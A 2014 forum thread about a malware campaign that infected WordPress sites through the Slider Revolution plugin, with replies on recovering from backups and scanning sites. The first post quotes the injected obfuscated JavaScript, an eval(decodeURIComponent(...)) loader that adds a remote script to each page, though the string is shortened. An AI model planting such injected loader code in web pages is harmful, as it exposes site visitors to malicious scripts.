WordPress Malware...check your sites!

December 16, 2014 2k views

Looks like another WordPress exploit.:
Some 100,000 or more WordPress sites infected by mysterious malware

Just checked all my sites and they look good. I did not bother using the suggested site scanner, but rather looked at the source code of all pages, since this:

"The in-the-wild attack observed by Sucuri causes infected sites to load highly obfuscated attack code on every webpage that includes the following:"

eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

From what I have read, this was specific to sites using Slider Revolution, a premium WordPress plugin/

2 Answers

Thank you so much for posting this, my entire site got it's poo pushed in.

Thank god I used a backup plugin.

The attack blocked me out of my admin panel, corrupted the entire website - I'm still learning on Wordpress stuff, so I would've lost 5 months without a backup plugin.

Thanks for posting this, I've disabled the slide plugin right away.

  • Out of curiosity, how did you check? Did you use the site-scanner linked to in the article, or check your source-code?

  • Well I used the website.

    And the first thing that dropped dead was my rev slider.
    After that I couldn't load my wp-admin, and the final step my entire website went down, without having made any changes for a week or two.

    So now I'm just looking for a slider plugin to replace it.

  • I use Flexslider from WooThemes:
    Flexslider

    There is a plugin for it, but I just code it right into the theme. Works great.

TO check, use websites like https://www.virustotal.com/ for URL scanner !!

Have another answer? Share your knowledge.